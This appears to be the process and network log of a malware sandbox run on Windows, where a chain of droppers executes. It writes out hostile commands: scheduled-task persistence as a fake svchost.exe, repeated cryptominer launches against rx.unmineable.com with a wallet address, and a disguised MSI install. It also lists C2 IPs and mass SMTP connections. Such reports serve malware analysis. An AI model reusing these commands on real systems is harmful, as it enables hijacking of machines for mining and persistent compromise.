"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2440 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {50accd5e-44cf-4785-8112-a5dbe28bf6b0} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" socket

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3032 -childID 1 -isForBrowser -prefsHandle 3296 -prefMapHandle 3328 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94f8cef6-2f7c-4281-9f62-761d6a50fb73} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3788 -childID 2 -isForBrowser -prefsHandle 3208 -prefMapHandle 3004 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {788e0a73-7cb4-4bba-acf5-ce847c58a6ab} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2788 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4496 -prefMapHandle 4492 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f29bb8c9-085f-4c4c-9336-b973f0ce890b} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" utility

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3164 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5192 -childID 3 -isForBrowser -prefsHandle 5184 -prefMapHandle 5180 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97ef6b81-28b2-4565-ad55-2c2f46a448e0} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5432 -childID 4 -isForBrowser -prefsHandle 5424 -prefMapHandle 5420 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {323e5b80-a7b3-4a95-81ba-1cb9ddb4c4f7} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5656 -childID 5 -isForBrowser -prefsHandle 5648 -prefMapHandle 5548 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0e1585f-5c7f-4cf2-825c-2992fa7afdf4} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\1000029002\84743dcfde.exe

"C:\Users\Admin\1000029002\84743dcfde.exe"

C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe

"C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6056 -ip 6056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 1100

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe

"C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "

C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe

clamer.exe -priverdD

C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe

"C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\ProgramData\xpmvhsd\agpphek.exe

C:\ProgramData\xpmvhsd\agpphek.exe

C:\Users\Admin\AppData\Local\Temp\pureee.exe

"C:\Users\Admin\AppData\Local\Temp\pureee.exe"

C:\Users\Admin\AppData\Local\Temp\adada.exe

"C:\Users\Admin\AppData\Local\Temp\adada.exe"

C:\Users\Admin\AppData\Local\Temp\dropperrr.exe

"C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe

"C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=220,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3704 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2280 /prefetch:2

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DirectX11\em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 14DACB80DBDFC332DF65DB0A9EFEEEAC

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding CB04F01786E3B7FD6C6ED8BD6F4FAFDD E Global\MSI0000

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\SysWOW64\cmd.exe" /C "cd "C:\Program Files (x86)\COMODO\Endpoint Manager\" && "C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe" "

C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe

"C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe

"C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe"

C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe

"C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe"

C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe

"C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe" noui

C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe

"C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
RU 185.215.113.19:80 185.215.113.19 tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 19.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
FR 172.217.20.174:443 www.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
FR 172.217.18.206:443 consent.youtube.com tcp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
FR 142.250.201.174:443 www.youtube.com tcp
FR 142.250.201.174:443 www.youtube.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 174.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 206.18.217.172.in-addr.arpa udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
FR 142.250.201.174:443 youtube-ui.l.google.com udp
FR 172.217.20.174:443 youtube-ui.l.google.com tcp
US 8.8.8.8:53 consent.youtube.com udp
FR 172.217.18.206:443 consent.youtube.com tcp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
FR 172.217.18.206:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
FR 172.217.18.206:443 consent.youtube.com udp
US 8.8.8.8:53 174.201.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.74.250.142.in-addr.arpa udp
US 8.8.8.8:53 74.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 1.97.149.34.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.196:443 www.google.com udp
US 8.8.8.8:53 234.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.20.217.172.in-addr.arpa udp
FR 172.217.20.196:443 www.google.com tcp
FR 172.217.20.196:443 www.google.com tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:59547 tcp
RU 85.28.47.31:80 85.28.47.31 tcp
US 8.8.8.8:53 31.47.28.85.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
NL 91.92.240.111:80 91.92.240.111 tcp
US 8.8.8.8:53 111.240.92.91.in-addr.arpa udp
NL 91.92.240.111:1334 91.92.240.111 tcp
N/A 127.0.0.1:59575 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
FR 172.217.20.174:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
FR 172.217.20.174:443 redirector.gvt1.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 155.134.221.88.in-addr.arpa udp
FR 172.217.20.174:443 redirector.gvt1.com udp
US 8.8.8.8:53 r1---sn-aigzrnsr.gvt1.com udp
GB 74.125.175.38:443 r1---sn-aigzrnsr.gvt1.com tcp
US 8.8.8.8:53 r1.sn-aigzrnsr.gvt1.com udp
US 8.8.8.8:53 r1.sn-aigzrnsr.gvt1.com udp
US 8.8.8.8:53 38.175.125.74.in-addr.arpa udp
GB 74.125.175.38:443 r1.sn-aigzrnsr.gvt1.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
FR 142.250.201.174:443 play.google.com tcp
FR 142.250.201.174:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
FR 142.250.201.174:443 play.google.com tcp
FR 142.250.201.174:443 play.google.com tcp
FR 142.250.201.174:443 play.google.com udp
NL 91.92.240.111:80 91.92.240.111 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
GB 74.125.175.38:443 r1.sn-aigzrnsr.gvt1.com tcp
GB 74.125.175.38:443 r1.sn-aigzrnsr.gvt1.com tcp
FR 172.217.18.206:443 consent.youtube.com udp
NL 91.92.240.111:80 91.92.240.111 tcp
NL 91.92.240.111:80 91.92.240.111 tcp
CH 185.196.9.187:80 185.196.9.187 tcp
NL 91.92.240.111:39001 tcp
US 8.8.8.8:53 187.9.196.185.in-addr.arpa udp
CA 51.222.21.20:4782 tcp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:443 ipwho.is tcp
US 8.8.8.8:53 20.21.222.51.in-addr.arpa udp
NL 91.92.240.111:80 91.92.240.111 tcp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 claywyaeropumps.com udp
NL 185.43.220.45:4000 claywyaeropumps.com tcp
NL 185.43.220.45:4334 claywyaeropumps.com tcp
US 8.8.8.8:53 45.220.43.185.in-addr.arpa udp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:3333 rx.unmineable.com tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 api.vk.com udp
RU 93.186.225.205:443 api.vk.com tcp
US 8.8.8.8:53 205.225.186.93.in-addr.arpa udp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 ip.proxypool.cloud udp
FR 178.32.54.191:80 ip.proxypool.cloud tcp
US 8.8.8.8:53 ip-cf.proxypool.cloud udp
US 172.67.209.138:443 ip-cf.proxypool.cloud tcp
GB 161.35.34.195:3333 rx.unmineable.com tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 191.54.32.178.in-addr.arpa udp
US 8.8.8.8:53 138.209.67.172.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.196:443 www.google.com tcp
US 104.16.133.229:443 tcp
US 8.8.8.8:53 229.133.16.104.in-addr.arpa udp
FR 172.217.20.196:443 www.google.com tcp
US 8.8.8.8:53 secure.gfdui.com udp
US 8.8.8.8:53 mail.optonline.net udp
US 65.20.63.172:587 mail.optonline.net tcp
US 8.8.8.8:53 buko-studios.com udp
US 8.8.8.8:53 alt2.aspmx.l.google.com udp
US 209.59.190.124:587 buko-studios.com tcp
NL 142.250.153.27:587 alt2.aspmx.l.google.com tcp
US 8.8.8.8:53 mail.optimum.net udp
US 8.8.8.8:53 securesmtp.modartdesign.com.au udp
US 65.20.63.172:587 mail.optimum.net tcp
US 8.8.8.8:53 out.mandp.co.bw udp
US 65.20.63.172:587 mail.optimum.net tcp
US 8.8.8.8:53 mx.plala.or.jp udp
US 8.8.8.8:53 out.eresmas.com udp
US 8.8.8.8:53 smtp.virgilio.it udp
IT 213.209.1.145:587 smtp.virgilio.it tcp
US 8.8.8.8:53 dubliniff.com udp
ES 62.37.237.60:587 out.eresmas.com tcp
US 104.21.0.127:465 dubliniff.com tcp
US 8.8.8.8:53 secure.dhshorseshoe.com udp
US 8.8.8.8:53 172.63.20.65.in-addr.arpa udp
US 8.8.8.8:53 124.190.59.209.in-addr.arpa udp
US 8.8.8.8:53 145.1.209.213.in-addr.arpa udp
US 8.8.8.8:53 eforward2.registrar-servers.com udp
US 162.255.118.52:465 eforward2.registrar-servers.com tcp
JP 60.36.166.235:587 mx.plala.or.jp tcp
US 8.8.8.8:53 smtp.centrum.cz udp
CZ 46.255.231.70:587 smtp.centrum.cz tcp
US 8.8.8.8:53 upcmail.nl udp
US 65.20.63.172:587 mail.optimum.net tcp
US 8.8.8.8:53 smtp.mondello.it udp
US 8.8.8.8:53 smtp.ligcorp.com udp
US 8.8.8.8:53 smtp.ftc-i.net udp
US 8.8.8.8:53 nate.com udp
US 65.20.63.172:587 mail.optimum.net tcp
KR 120.50.131.112:587 nate.com tcp
IT 62.149.128.200:587 smtp.mondello.it tcp
US 8.8.8.8:53 conformgroup.com udp
US 8.8.8.8:53 in.com udp
US 65.20.63.172:587 mail.optimum.net tcp
US 8.8.8.8:53 smtp.mccai.com udp
IN 124.153.64.203:587 in.com tcp
US 18.214.227.117:587 smtp.ftc-i.net tcp
US 143.95.83.75:587 conformgroup.com tcp
US 52.86.6.113:465 smtp.mccai.com tcp
KR 43.246.152.100:587 smtp.ligcorp.com tcp
US 8.8.8.8:53 mail.freechal.com udp
US 8.8.8.8:53 mx.websitebod.com udp
US 8.8.8.8:53 epost.de udp
US 167.172.23.243:587 mx.websitebod.com tcp
NL 20.23.151.207:587 epost.de tcp
US 8.8.8.8:53 out.stu.janesville.wi.us udp
US 8.8.8.8:53 abv.bg udp
US 8.8.8.8:53 rogers.com udp
BG 194.153.145.104:587 abv.bg tcp
CA 40.85.218.2:587 rogers.com tcp
US 8.8.8.8:53 smtp.york.ac.uk udp
GB 144.32.128.175:587 smtp.york.ac.uk tcp
US 8.8.8.8:53 secure.gianlucadegennaro.it udp
US 8.8.8.8:53 secure.harvestsllc.com udp
US 8.8.8.8:53 iinet-mx1.titanhq.com udp
US 65.20.63.172:587 mail.optimum.net tcp
US 3.140.150.54:25 iinet-mx1.titanhq.com tcp
US 8.8.8.8:53 70.231.255.46.in-addr.arpa udp
US 8.8.8.8:53 200.128.149.62.in-addr.arpa udp
US 8.8.8.8:53 117.227.214.18.in-addr.arpa udp
US 8.8.8.8:53 75.83.95.143.in-addr.arpa udp
